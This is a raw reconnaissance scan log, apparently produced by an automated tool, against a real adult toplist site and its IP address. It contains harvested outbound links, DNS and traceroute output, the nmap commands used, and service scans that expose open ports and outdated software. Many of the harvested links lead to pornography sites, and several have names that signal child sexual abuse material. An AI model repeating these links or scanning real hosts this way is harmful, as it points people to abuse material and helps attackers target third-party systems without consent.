500[#] http://2015studio.com
501[#] http://2015studio.com/members-1/
502[#] http://tropistudio.com/
503[#] http://collectable18.com/membership/
504[#] http://tropistudio.com/vip-membership/
505[#] http://tropistudio.com/join/
506[#] http://2015studio.com
507[#] http://2015studio.com/members-1/
508[#] http://2015studio.com/
509[#] http://collectable18.com/
510[#] http://tropistudio.com/
511[#] http://tropistudio.com/join/
512[#] http://uberporno.com
513[#] http://2015studio.com/
514[#] http://2015studio.com/
515[#] http://collectable18.com/
516[#] http://tropistudio.com/
517[#] http://tropistudio.com/join/
518[#] http://uberporno.com
519[#] http://2015studio.com/
520[#] http://tropistudio.com/full-list-of-videos-by-name/
521[#] http://2015studio.com
522[#] http://tropistudio.com
523[#] http://collectable18.com
524[#] http://uberporno.com
525[#] http://matrimony.life
526[#] http://2015studio.com
527[#] https://360buysale.com/sample-page/adult-store/for-men/small-pussy-male-toy/
528[#] http://tropistudio.com/
529[#] http://matrimony.life
530[#] http://uberporno.com/active-webcam-free/
531[#] http://uberporno.com/
532[#] http://collectable18.com
533[#] http://collectable18.com/membership/
534[#] http://2015studio.com
535--------------------------------------------------
536[#] Mapping Subdomain..
537[!] Found 1 Subdomain
538- hello-chat.com
539--------------------------------------------------
540[!] Done At 2020-03-18 20:36:03.276556
541#################################################################################################################################
542[INFO] ------TARGET info------
543[*] TARGET: http://hello-chat.com/rank100.html?26
544[*] TARGET IP: 199.38.245.243
545[INFO] NO load balancer detected for hello-chat.com...
546[*] DNS servers: ns25.domaincontrol.com.
547[*] TARGET server: Apache/2
548[*] CC: US
549[*] Country: United States
550[*] RegionCode: NJ
551[*] RegionName: New Jersey
552[*] City: Hackensack
553[*] ASN: AS394625
554[*] BGP_PREFIX: 199.38.240.0/21
555[*] ISP: WHITELABELIT, US
556[INFO] DNS enumeration:
557[INFO] Possible abuse mails are:
558[*] abuse@hello-chat.com
559[*] abuse@toqen.com
560[*] postmaster@toqen.com
561[INFO] NO PAC (Proxy Auto Configuration) file FOUND
562[INFO] Starting FUZZing in http://hello-chat.com/FUzZzZzZzZz...
563[INFO] Status code Folders
564[ALERT] Look in the source code. It may contain passwords
565[INFO] Links found from http://hello-chat.com/rank100.html?26 http://199.38.245.243/:
566[*] http://2015studio.com/
567[*] http://2015studio.com/members-1/
568[*] http://2015studio.com/viparea/
569[*] http://collectable18.com/
570[*] http://collectable18.com/join/
571[*] http://collectable18.com/membership/
572[*] http://hello-chat.com/cgi-bin/rank/members.cgi
573[*] http://hello-chat.com/cgi-bin/rank/members.cgi?add
574[*] http://hello-chat.com/cgi-bin/rank/members.cgi?mail
575[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=109&url=http://hello-teen.com/cgi-bin/ranking/in.cgi?id=331=onClick='OpenWin_coolart()'
576[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=10&url=http://www.models-top.com/cgi-bin/rankem.cgi?id=hchat
577[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=112&url=http://heavenx.sextgem.com
578[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=123&url=http://cute-girls.sextgem.com
579[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=128&url=http://uberporno.com/free-video-4-members/
580[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=197&url=http://101top.biz/cgi-bin/top/in.cgi?id=1
581[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=1&url=http://anonnn.com/cgi-bin/toplist/in.cgi?id=87
582[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=215&url=http://russianmodels.sextgem.com
583[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=218&url=http://xxx18teens.blog.fc2.com
584[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=220&url=http://younglist.net/cgi-bin/in.cgi?id=240
585[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=240&url=http://www.eroticgirlsgallery.com/nonude/in.cgi?id=600
586[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=242&url=http://tropistudio.com
587[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=319&url=http://789ff.info
588[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=31&url=http://free.top-dolls.net/cgi-bin/in.cgi?id=1663
589[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=329&url=http://www.galacticporn.xyz/indexporno.php
590[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=32&url=http://www.models-list.org/cgi-bin/in.cgi?id=2900
591[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=330&url=http://www.x-porn.ovh/indexporno.php
592[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=343&url=http://www.supercock.ovh/indexporno.php
593[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=344&url=http://www.tubeporn.ovh/indexporno.php
594[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=366&url=http://3wisp.com/amateur/superdating/ww/
595[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=367&url=http://preteentop.com/site/top-list/?ide=27
596[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=377&url=http://www.universporn.com/indexporno.php
597[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=378&url=http://www.sexcrimes.xyz/indexporno.php
598[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=379&url=http://www.sexofanarchy.com/indexporno.php
599[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=37&url=http://nonude-top.info/cgi-bin/in.cgi?id=108
600[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=380&url=http://www.thekingofsex.org/indexporno.php
601[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=381&url=http://uberporno.com/toplist/
602[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=388&url=http://www.sunporn.org/indexporno.php
603[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=389&url=http://www.vidpornix.com/indexporno.php
604[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=390&url=http://www.porntubexgirl.com/indexporno.php
605[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=391&url=http://www.cochonnerie.net/indexporno.php
606[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=392&url=http://www.plaisirs-hot.net/indexporno.php
607[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=399&url=http://teen.bestelinks.nl
608[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=403&url=http://18chan.sextgem.com
609[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=404&url=http://thebestofporn.ovh/indexporno.php
610[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=405&url=http://18javchan.sextgem.com
611[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=406&url=http://www.assqueen.ovh/indexporno.php
612[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=408&url=http://www.teenpussy.ovh/indexporno.php
613[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=409&url=http://www.eroticteens.ovh/indexporno.php
614[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=411&url=http://www.glamourgirls.ovh/indexporno.php
615[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=412&url=http://www.puresex.ovh/indexporno.php
616[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=415&url=http://www.slutsofthenet.ovh/indexporno.php
617[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=416&url=http://www.freepornlist.ovh/indexporno.php
618[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=417&url=http://russian-teens.sextgem.com
619[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=418&url=http://www.japporn.ovh/indexporno.php
620[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=420&url=http://www.sexhentai.ovh/indexporno.php
621[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=421&url=http://www.asianteen.ovh/indexporno.php
622[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=422&url=http://teeniesland.sextgem.com
623[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=423&url=http://mysexselfies.net/top-list/?ide=679
624[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=425&url=http://www.slutsmature.ovh/indexporno.php
625[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=429&url=http://www.hentaixporn.ovh/indexporno.php
626[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=430&url=http://www.picsnudeteen.ovh/indexporno.php
627[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=431&url=http://www.pornamateur.ovh/indexporno.php
628[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=432&url=http://www.motherporn.ovh/indexporno.php
629[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=433&url=http://lo-land.sextgem.com
630[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=434&url=http://www.tubeasiangirl.ovh/indexporno.php
631[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=435&url=http://www.tubehentai.ovh/indexporno.php
632[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=436&url=http://www.slutspictures.ovh/indexporno.php
633[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=438&url=http://www.chinesesexporn.ovh/indexporno.php
634[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=439&url=http://www.cartoonsporn.ovh/indexporno.php
635[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=440&url=http://www.sexacademy.ovh/indexporno.php
636[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=461&url=http://daddyheaven.sextgem.com
637[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=464&url=http://nsfwshemale.com/category/shemale-teens/
638[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=465&url=http://nsfwnetworks.com/category/teen
639[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=466&url=http://www.arthotporn.ovh/indexporno.php
640[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=469&url=http://nnchantop.com/
641[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=473&url=http://fashion-models-top.com/
642[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=474&url=http://nonudeslists.com/
643[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=477&url=http://100nn.net/?ref=hello-chat.com
644[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=485&url=http://nonu-chan.com/?ref=hello-chat.com
645[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=487&url=http://nonublog.com/?ref=hello-chat.com
646[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=488&url=http://www.nonstop-nn.net/cgi-bin/in.cgi?id=761
647[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=489&url=http://coolarts.net/cgi-bin/in.cgi?id=900
648[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=490&url=http://nonutop.com/cgi-bin/in.cgi?id=766
649[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=493&url=http://top.waredolls.com/cgi-bin/rankem.cgi?id=hellocha
650[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=495&url=http://flash-top.net/cgi-bin/in.cgi?id=947
651[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=498&url=http://www.models-list.org/cgi-bin/in.cgi?id=3779
652[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=507&url=http://young-taboo.sextgem.com
653[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=508&url=http://nanastar.gr/
654[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=50&url=http://nonude-top.xyz/cgi-bin/in.cgi?id=138
655[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=511&url=http://fuckedhot.sextgem.com
656[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=512&url=http://pthcforums.new.so/
657[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=513&url=http://javx.sextgem.com/
658[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=517&url=http://rapesex.net/
659[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=518&url=http://porncentral.xyz
660[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=520&url=http://oknaked.net/site/top-list/?ide=85
661[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=53&url=http://top.top-dolls.net/cgi-bin/in.cgi?id=1655
662[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=54&url=http://www.2015studio.com
663[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=55&url=http://www.wowmodels.info/?ft=hello-chat.com
664[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=56&url=http://www.wonteens.com/?ft=hello-chat.com
665[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=5&url=http://teen-tiny.com/cgi-bin/toplist/in.cgi?id=99
666[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=6&url=http://www.andypioneer.com/cgi-bin/rankem.cgi?id=hchat
667[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=8&url=http://www.coolnymph.com/cgi-bin/rankem.cgi?id=hchat
668[*] http://hello-chat.com/cgi-bin/rank/out.cgi?ses=uNcncqHFNx&id=9&url=http://www.young-models.info/cgi-bin/rankem.cgi?id=hchat
669[*] http://hello-chat.com/rank1002.html
670[*] http://matrimony.life/
671[*] https://360buysale.com/sample-page/adult-store/for-men/small-pussy-male-toy/
672[*] http://sexypixel.com/
673[*] http://sexypixel.com/join/
674[*] http://tropistudio.com/
675[*] http://tropistudio.com/full-list-of-videos-by-name/
676[*] http://tropistudio.com/join/
677[*] http://tropistudio.com/vip-membership/
678[*] http://uberporno.com/
679[*] http://uberporno.com/active-webcam-free/
680cut: intervalle de champ incorrecte
681Saisissez « cut --help » pour plus d'informations.
682[INFO] Shodan detected the following opened ports on 199.38.245.243:
683[*] 1
684[*] 143
685[*] 21
686[*] 22
687[*] 3306
688[*] 4
689[*] 443
690[*] 465
691[*] 80
692[INFO] ------VirusTotal SECTION------
693[INFO] VirusTotal passive DNS only stores address records. The following domains resolved to the given IP address:
694[INFO] Latest URLs hosted in this IP address detected by at least one URL scanner or malicious URL dataset:
695[INFO] Latest files that are not detected by any antivirus solution and were downloaded by VirusTotal from the IP address provided:
696[INFO] ------Alexa Rank SECTION------
697[INFO] Percent of Visitors Rank in Country:
698[INFO] Percent of Search Traffic:
699[INFO] Percent of Unique Visits:
700[INFO] Total Sites Linking In:
701[*] Total Sites
702[INFO] Useful links related to hello-chat.com - 199.38.245.243:
703[*] https://www.virustotal.com/pt/ip-address/199.38.245.243/information/
704[*] https://www.hybrid-analysis.com/search?host=199.38.245.243
705[*] https://www.shodan.io/host/199.38.245.243
706[*] https://www.senderbase.org/lookup/?search_string=199.38.245.243
707[*] https://www.alienvault.com/open-threat-exchange/ip/199.38.245.243
708[*] http://pastebin.com/search?q=199.38.245.243
709[*] http://urlquery.net/search.php?q=199.38.245.243
710[*] http://www.alexa.com/siteinfo/hello-chat.com
711[*] http://www.google.com/safebrowsing/diagnostic?site=hello-chat.com
712[*] https://censys.io/ipv4/199.38.245.243
713[*] https://www.abuseipdb.com/check/199.38.245.243
714[*] https://urlscan.io/search/#199.38.245.243
715[*] https://github.com/search?q=199.38.245.243&type=Code
716[INFO] Useful links related to AS394625 - 199.38.240.0/21:
717[*] http://www.google.com/safebrowsing/diagnostic?site=AS:394625
718[*] https://www.senderbase.org/lookup/?search_string=199.38.240.0/21
719[*] http://bgp.he.net/AS394625
720[*] https://stat.ripe.net/AS394625
721[INFO] Date: 18/03/20 | Time: 20:36:53
722[INFO] Total time: 1 minute(s) and 2 second(s)
723#################################################################################################################################
724Trying "hello-chat.com"
725;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 56603
726;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 4
727
728;; QUESTION SECTION:
729;hello-chat.com. IN ANY
730
731;; ANSWER SECTION:
732hello-chat.com. 3600 IN SOA ns25.domaincontrol.com. dns.jomax.net. 2019060602 28800 7200 604800 600
733hello-chat.com. 600 IN A 199.38.245.243
734hello-chat.com. 3600 IN NS ns26.domaincontrol.com.
735hello-chat.com. 3600 IN NS ns25.domaincontrol.com.
736
737;; ADDITIONAL SECTION:
738ns25.domaincontrol.com. 5084 IN AAAA 2603:5:2161::d
739ns26.domaincontrol.com. 38260 IN AAAA 2603:5:2261::d
740ns25.domaincontrol.com. 5038 IN A 97.74.102.13
741ns26.domaincontrol.com. 37792 IN A 173.201.70.13
742
743Received 237 bytes from 2001:18c0:121:6900:724f:b8ff:fefd:5b6a#53 in 80 ms
744#################################################################################################################################
745; <<>> DiG 9.11.16-2-Debian <<>> +trace hello-chat.com any
746;; global options: +cmd
747. 86400 IN NS c.root-servers.net.
748. 86400 IN NS h.root-servers.net.
749. 86400 IN NS d.root-servers.net.
750. 86400 IN NS m.root-servers.net.
751. 86400 IN NS k.root-servers.net.
752. 86400 IN NS g.root-servers.net.
753. 86400 IN NS e.root-servers.net.
754. 86400 IN NS j.root-servers.net.
755. 86400 IN NS l.root-servers.net.
756. 86400 IN NS i.root-servers.net.
757. 86400 IN NS f.root-servers.net.
758. 86400 IN NS b.root-servers.net.
759. 86400 IN NS a.root-servers.net.
760. 86400 IN RRSIG NS 8 0 518400 20200331170000 20200318160000 33853 . qgasYmvTaMw/ft2FJz7Ze3a8EYdfzDR3E/n9ffoT8zkgJZhW74Yf1Tdn yt7zJUoZjZSL0px3bOccsey7rwAAt7PG3PKsG50hINxFU/G65DdLn5Fe 0E3wqLh7J2oix+own3AHEUyntF3nuL/surpqvvZpLoS+DU4enbMfJlZf KSu2/73I+n6tx57gGWnekkFlgq7JVBS6MDry5UsFR4C3GwBInUqcFiQQ ATVi6s9+xcWmTWhUOLtZa9JyStBDWanch24001hD51VLFix7DOnA1+oG 9IcdQjqO4WTbzk2TgfRGNvax6IPeVWwLOTaDfpH/1UjfqI6OVNldnXSE xBsI6g==
761;; Received 525 bytes from 10.101.0.243#53(10.101.0.243) in 170 ms
762
763com. 172800 IN NS j.gtld-servers.net.
764com. 172800 IN NS l.gtld-servers.net.
765com. 172800 IN NS f.gtld-servers.net.
766com. 172800 IN NS b.gtld-servers.net.
767com. 172800 IN NS m.gtld-servers.net.
768com. 172800 IN NS g.gtld-servers.net.
769com. 172800 IN NS c.gtld-servers.net.
770com. 172800 IN NS k.gtld-servers.net.
771com. 172800 IN NS e.gtld-servers.net.
772com. 172800 IN NS a.gtld-servers.net.
773com. 172800 IN NS d.gtld-servers.net.
774com. 172800 IN NS h.gtld-servers.net.
775com. 172800 IN NS i.gtld-servers.net.
776com. 86400 IN DS 30909 8 2 E2D3C916F6DEEAC73294E8268FB5885044A833FC5459588F4A9184CF C41A5766
777com. 86400 IN RRSIG DS 8 1 86400 20200331170000 20200318160000 33853 . IqOJ6nE+fKiwc8jNJy+qBpMo2fMSJSYGRbfNO6sz4VejsuoYGDuEdrb4 g/bcwebIXaCWIn/d3pOQaf7f0jweWvykYr4uyKj6Q1fu+ppvzLHyvLxw +OmqOStuZXXgw/kiMEyEFaRGuFShZd74clSc/LJnOjtRXZ3vIb1LSXZZ cTT9nBKIgCe/yS/cbZwWLdkoK4q0vqEJgcdIhdrUsghfti+EVAieq/W/ lYuafNiOdh474NuPdJLM1FRdYey49TLVdyUoZ8n3M+JmRygPLEqH4RAk BFN5Z0DZsWEj7Ny/gAxnxApvM3w1Bog9X4Zl9DvI5DV53Ek4U2b7GCd3 ijCY4Q==
778;; Received 1202 bytes from 2001:500:2::c#53(c.root-servers.net) in 36 ms
779
780hello-chat.com. 172800 IN NS ns25.domaincontrol.com.
781hello-chat.com. 172800 IN NS ns26.domaincontrol.com.
782CK0POJMG874LJREF7EFN8430QVIT8BSM.com. 86400 IN NSEC3 1 1 0 - CK0Q1GIN43N1ARRC9OSM6QPQR81H5M9A NS SOA RRSIG DNSKEY NSEC3PARAM
783CK0POJMG874LJREF7EFN8430QVIT8BSM.com. 86400 IN RRSIG NSEC3 8 2 86400 20200322044927 20200315033927 56311 com. pKi3j2T+MmOgxjdmTcZS3YYGSfTSSb0jX5woxUr9roiXvsiM6gxczhHa 43lZFia30VmrYsRNrA43ddnO03iC0bAU0QOfsMSZ0SasKx6fAb+Ynj0H Z/MlenueBOVWr11KlixRNF5hZgLIl+c/+nVM48BkKM6Xfoju4j8+Wedm Nm9phbpnEyd+awJ31vZJAvXDfwOT1SAqqKEq2F06iYoR4g==
784BVHU08J7R519UGC3MNB04JPPMVAV8RCM.com. 86400 IN NSEC3 1 1 0 - BVI05FTLOLJA9PHS9DDILLBMSJDBDH2D NS DS RRSIG
785BVHU08J7R519UGC3MNB04JPPMVAV8RCM.com. 86400 IN RRSIG NSEC3 8 2 86400 20200325050129 20200318035129 56311 com. ulFZGN9XRFs6qPc6pomB9ZgSwX7CzzsoM0e2fCREJWoVwKaE9fuDOSIB Tr93K3VYxrYEn3aGNRuYqGCu/kbHHvIVJDemfbz1I49iOpP6FEg+TA2n YPs5HgBIA1JHh18Z1GI7U61NyewyukHKXD266nrBaLLui5FTQqkSp4w6 4LBsENfuGy00JZK0Lor5kMfCsv07kjsH8YGBaLfbBWCzVw==
786;; Received 732 bytes from 192.33.14.30#53(b.gtld-servers.net) in 177 ms
787
788hello-chat.com. 600 IN A 199.38.245.243
789hello-chat.com. 3600 IN NS ns25.domaincontrol.com.
790hello-chat.com. 3600 IN NS ns26.domaincontrol.com.
791hello-chat.com. 3600 IN SOA ns25.domaincontrol.com. dns.jomax.net. 2019060602 28800 7200 604800 600
792;; Received 160 bytes from 173.201.70.13#53(ns26.domaincontrol.com) in 168 ms
793
794#################################################################################################################################
795traceroute to hello-chat.com (199.38.245.243), 30 hops max, 60 byte packets
796 1 _gateway (10.203.41.1) 131.174 ms 131.154 ms 131.137 ms
797 2 * * *
798 3 te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49) 136.377 ms 136.377 ms 136.354 ms
799 4 be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249) 136.333 ms 136.316 ms 136.300 ms
800 5 be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194) 141.927 ms 141.931 ms 141.917 ms
801 6 be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1) 160.657 ms 156.954 ms be2282.ccr42.ham01.atlas.cogentco.com (154.54.72.105) 152.994 ms
802 7 be2815.ccr41.ams03.atlas.cogentco.com (154.54.38.205) 165.080 ms be2816.ccr42.ams03.atlas.cogentco.com (154.54.38.209) 165.138 ms be2815.ccr41.ams03.atlas.cogentco.com (154.54.38.205) 161.362 ms
803 8 be12194.ccr41.lon13.atlas.cogentco.com (154.54.56.93) 254.863 ms be12488.ccr42.lon13.atlas.cogentco.com (130.117.51.41) 235.892 ms be12265.ccr41.par01.atlas.cogentco.com (130.117.2.142) 238.805 ms
804 9 be3627.ccr41.jfk02.atlas.cogentco.com (66.28.4.197) 242.372 ms be2317.ccr41.jfk02.atlas.cogentco.com (154.54.30.185) 236.239 ms 236.691 ms
80510 be2262.rcr21.ewr03.atlas.cogentco.com (154.54.47.122) 239.394 ms 242.260 ms 237.466 ms
80611 be2273.rcr21.ewr03.atlas.cogentco.com (154.54.83.206) 241.145 ms * *
807#################################################################################################################################
808Domains still to check: 1
809 Checking if the hostname hello-chat.com. given is in fact a domain...
810
811Analyzing domain: hello-chat.com.
812 Checking NameServers using system default resolver...
813 IP: 173.201.70.13 (United States)
814 HostName: ns26.domaincontrol.com Type: NS
815 HostName: ns26.domaincontrol.com Type: PTR
816 IP: 97.74.102.13 (United States)
817 HostName: ns25.domaincontrol.com Type: NS
818 HostName: ns25.domaincontrol.com Type: PTR
819
820 Checking MailServers using system default resolver...
821 WARNING!! There are no MX records for this domain
822
823 Checking the zone transfer for each NS... (if this takes more than 10 seconds, just hit CTRL-C and it will continue. Bug in the libs)
824 No zone transfer found on nameserver 173.201.70.13
825 No zone transfer found on nameserver 97.74.102.13
826
827 Checking SPF record...
828 No SPF record
829
830 Checking 192 most common hostnames using system default resolver...
831 IP: 199.38.245.243 (United States)
832 HostName: www.hello-chat.com. Type: A
833
834 Checking with nmap the reverse DNS hostnames of every <ip>/24 netblock using system default resolver...
835 Checking netblock 173.201.70.0
836 Checking netblock 199.38.245.0
837 Checking netblock 97.74.102.0
838
839 Searching for hello-chat.com. emails in Google
840
841 Checking 3 active hosts using nmap... (nmap -sn -n -v -PP -PM -PS80,25 -PA -PY -PU53,40125 -PE --reason <ip> -oA <output_directory>/nmap/<ip>.sn)
842 Host 173.201.70.13 is up (echo-reply ttl 52)
843 Host 199.38.245.243 is up (syn-ack ttl 53)
844 Host 97.74.102.13 is up (echo-reply ttl 51)
845
846 Checking ports on every active host using nmap... (nmap -O --reason --webxml --traceroute -sS -sV -sC -Pn -n -v -F <ip> -oA <output_directory>/nmap/<ip>)
847 Scanning ip 173.201.70.13 (ns26.domaincontrol.com (PTR)):
848 53/tcp open tcpwrapped syn-ack ttl 52
849 Scanning ip 199.38.245.243 (www.hello-chat.com.):
850 21/tcp open ftp syn-ack ttl 53 Pure-FTPd
851 | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US
852 | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US
853 | Public Key type: rsa
854 | Public Key bits: 2048
855 | Signature Algorithm: sha1WithRSAEncryption
856 | Not valid before: 2019-06-04T16:48:56
857 | Not valid after: 2046-10-19T16:48:56
858 | MD5: 1c46 8407 1d70 7382 d40e 8cc7 ec33 e972
859 |_SHA-1: 068c 065f f10f e21c 83e3 9b69 2f58 aea4 6bc6 f592
860 |_ssl-date: 2020-03-19T00:51:20+00:00; +6m02s from scanner time.
861 22/tcp open ssh syn-ack ttl 53 OpenSSH 5.3 (protocol 2.0)
862 | ssh-hostkey:
863 | 1024 1a:0d:eb:77:2b:24:04:b9:fb:ff:06:3a:d3:de:0b:fc (DSA)
864 |_ 2048 59:7a:97:24:cd:1c:5a:3a:87:31:41:1d:60:aa:27:dc (RSA)
865 25/tcp open smtp syn-ack ttl 53 Exim smtpd 4.92
866 | smtp-commands: server.18they.com Hello nmap.scanme.org [45.132.192.91], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, STARTTLS, HELP,
867 |_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
868 | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
869 | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
870 | Public Key type: rsa
871 | Public Key bits: 4096
872 | Signature Algorithm: sha1WithRSAEncryption
873 | Not valid before: 2016-05-13T00:34:32
874 | Not valid after: 2043-09-28T00:34:32
875 | MD5: 4131 e074 fdcd 27ab dcd4 6c9d 6dff 1582
876 |_SHA-1: f7b5 61d5 0e95 b265 0bad 9da6 2a0e 7f26 3924 749c
877 |_ssl-date: 2020-03-19T00:51:20+00:00; +6m02s from scanner time.
878 53/tcp open domain syn-ack ttl 53 ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
879 | dns-nsid:
880 |_ bind.version: 9.8.2rc1-RedHat-9.8.2-0.68.rc1.el6_10.1
